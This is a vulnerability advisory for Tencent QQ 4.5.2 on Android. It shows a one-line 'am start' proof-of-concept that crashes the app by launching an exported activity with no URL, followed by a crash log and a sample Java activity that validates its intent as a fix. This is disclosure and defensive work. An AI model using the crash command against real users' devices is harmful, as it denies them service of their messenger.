Tencent Messenger (QQ) DoS vulnerability (critical)

The activity component com.tencent.mobileqq.activity.QQBrowserDelegationActivity can be invoked by any third-party app, which causes the process to crash.

Process Name: com.tencent.mobileqq

Version: 4.5.2

Affected package: http://pan.baidu.com/s/1lEFzo



PoC:

am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity



crash log:



 

E/AndroidRuntime( 2420): java.lang.RuntimeException: Unable to start activity ComponentInfo{com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity}: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1955)
E/AndroidRuntime( 2420): at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:1980)
E/AndroidRuntime( 2420): at android.app.ActivityThread.access$600(ActivityThread.java:122)
E/AndroidRuntime( 2420): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1146)
E/AndroidRuntime( 2420): at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime( 2420): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime( 2420): at android.app.ActivityThread.main(ActivityThread.java:4340)
E/AndroidRuntime( 2420): at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime( 2420): at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime( 2420): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:784)
E/AndroidRuntime( 2420): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:551)
E/AndroidRuntime( 2420): at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime( 2420): Caused by: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420): at android.net.Uri$StringUri.<init>(Uri.java:464)
E/AndroidRuntime( 2420): at android.net.Uri$StringUri.<init>(Uri.java:454)
E/AndroidRuntime( 2420): at android.net.Uri.parse(Uri.java:426)
E/AndroidRuntime( 2420): at com.tencent.mtt.spcialcall.sdk.MttApi.loadUrlInMbWnd(MttApi.java:68)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.a(ProGuard:264)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.b(ProGuard:448)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.onCreate(ProGuard:99)
E/AndroidRuntime( 2420): at android.app.Activity.performCreate(Activity.java:4465)
E/AndroidRuntime( 2420): at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1049)
E/AndroidRuntime( 2420): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1919)
E/AndroidRuntime( 2420): ... 11 more
W/ActivityManager( 78): Force finishing activity com.tencent.mobileqq/.activity.QQBrowserDelegationActivity
W/InputManagerService( 78): Window already focused, ignoring focus gain of: com.android.internal.view.IInputMethodClient$Stub$Proxy@41603f58
W/ThrottleService( 78): unable to find stats for iface rmnet0
I/WindowManager( 78): createSurface Window{414395e0 paused=false}: DRAW NOW PENDING
D/dalvikvm( 2420): GC_CONCURRENT freed 754K, 7% free 12872K/13767K, paused 4ms+17ms
W/ActivityManager( 78): Activity pause timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/NetworkManagementSocketTagger( 78): setKernelCountSet(10035, 0) failed with errno -2
D/dalvikvm( 2420): GC_CONCURRENT freed 727K, 6% free 13146K/13959K, paused 4ms+4ms
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711488865 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711488865
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711489146 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711489146
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711502275 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711502275
W/ActivityManager( 78): Activity destroy timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/ActivityManager( 78): Timeout executing service: ServiceRecord{41a68a38 com.tencent.mobileqq/.app.GuardService}
I/ActivityManager( 78): Crashing app skipping ANR: ProcessRecord{4145d828 2420:com.tencent.mobileqq/10035} Executing service com.tencent.mobileqq/.app.GuardService
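
The trace shows Uri.parse() being handed a null string because the activity was started with no URL in the intent. The following is an added example, not Tencent's code: a hypothetical exported activity that validates the incoming intent before using it. The class name, the `url` extra key and the http/https restriction are assumptions.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.webkit.WebView;

// Hypothetical activity for illustration; not the app's real class.
public class SafeBrowserDelegationActivity extends Activity {
    private static final String TAG = "SafeBrowserDelegation";
    // Assumed extra name; the key the real app reads is not shown in the report.
    static final String EXTRA_URL = "url";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri target = extractUrl(getIntent());
        if (target == null) {
            // Empty or malformed intent from another app: refuse and exit
            // instead of letting an exception kill the whole process.
            Log.w(TAG, "Rejected launch without a usable URL");
            finish();
            return;
        }
        WebView view = new WebView(this);
        setContentView(view);
        view.loadUrl(target.toString());
    }

    /** Returns a validated web Uri, or null if the intent does not carry one. */
    static Uri extractUrl(Intent intent) {
        if (intent == null) return null;
        String raw;
        try {
            raw = intent.getDataString();
            if (raw == null) raw = intent.getStringExtra(EXTRA_URL);
        } catch (RuntimeException e) {
            // Reading extras supplied by another app can itself throw.
            return null;
        }
        if (raw == null || raw.trim().isEmpty()) return null;
        Uri uri = Uri.parse(raw.trim());
        // Assumption: this component only ever needs to open web pages.
        String scheme = uri.getScheme();
        boolean web = "http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme);
        return web ? uri : null;
    }
}
```

If no other app needs to launch the activity, declaring it with android:exported="false" in the manifest removes the external entry point altogether.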
